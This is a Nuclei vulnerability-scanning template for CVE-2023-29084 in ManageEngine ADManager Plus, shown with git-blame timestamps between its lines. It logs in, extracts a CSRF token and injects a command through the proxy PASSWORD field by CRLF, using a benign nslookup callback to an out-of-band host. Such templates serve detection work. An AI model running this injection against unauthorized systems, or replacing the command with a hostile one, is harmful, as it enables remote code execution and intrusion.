2023-04-18 10:03:47 +00:00
|
|
|
id: CVE-2023-29084
|
2023-04-20 18:51:53 +00:00
|
|
|
|
2023-04-18 10:03:47 +00:00
|
|
|
info:
|
|
|
|
name: ManageEngine ADManager Plus - Command Injection
|
|
|
|
author: rootxharsh,iamnoooob,pdresearch
|
|
|
|
severity: high
|
2023-04-20 18:51:53 +00:00
|
|
|
description: |
|
|
|
|
Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.
|
|
|
|
reference:
|
2023-04-18 10:03:47 +00:00
|
|
|
- https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/
|
|
|
|
- https://community.grafana.com/t/release-notes-v6-3-x/19202
|
2023-07-11 19:49:27 +00:00
|
|
|
- http://packetstormsecurity.com/files/172755/ManageEngine-ADManager-Plus-Command-Injection.html
|
|
|
|
- https://manageengine.com
|
|
|
|
- https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 7.2
|
|
|
|
cve-id: CVE-2023-29084
|
|
|
|
cwe-id: CWE-77
|
|
|
|
epss-score: 0.2422
|
|
|
|
cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 3
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: zohocorp
|
|
|
|
product: manageengine_admanager_plus
|
2023-07-15 16:29:17 +00:00
|
|
|
tags: packetstorm,cve,cve2023,manageengine,admanager,rce,oast,authenticated
|
2023-04-18 10:03:47 +00:00
|
|
|
variables:
|
|
|
|
cmd: "nslookup.exe {{interactsh-url}} 1.1.1.1"
|
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2023-04-18 10:03:47 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /j_security_check HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Origin: {{BaseURL}}
|
|
|
|
Referer: {{BaseURL}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
is_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator
|
|
|
|
- |
|
|
|
|
GET /home.do HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
|
|
POST /api/json/admin/saveServerSettings HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
X-Requested-With: XMLHttpRequest
|
|
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
Origin: {{BaseURL}}
|
|
|
|
Referer: {{BaseURL}}
|
|
|
|
|
|
|
|
params=[{"tabId":"proxy","ENABLE_PROXY":true,"SERVER_NAME":"1.1.1.1","USER_NAME":"random","PASSWORD":"asd\r\n{{cmd}}","PORT":"80"}]&admpcsrf={{admpcsrf}}
|
|
|
|
|
|
|
|
cookie-reuse: true
|
|
|
|
host-redirects: true
|
|
|
|
max-redirects: 2
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- '{"message":"'
|
|
|
|
- 'Proxy Settings'
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol
|
|
|
|
words:
|
|
|
|
- "dns"
|
|
|
|
|
|
|
|
extractors:
|
|
|
|
- type: kval
|
|
|
|
name: admpcsrf
|
2023-07-11 19:49:27 +00:00
|
|
|
internal: true
|
2023-04-18 10:03:47 +00:00
|
|
|
kval:
|
|
|
|
- admpcsrf
|
2023-07-11 19:49:27 +00:00
|
|
|
part: header
|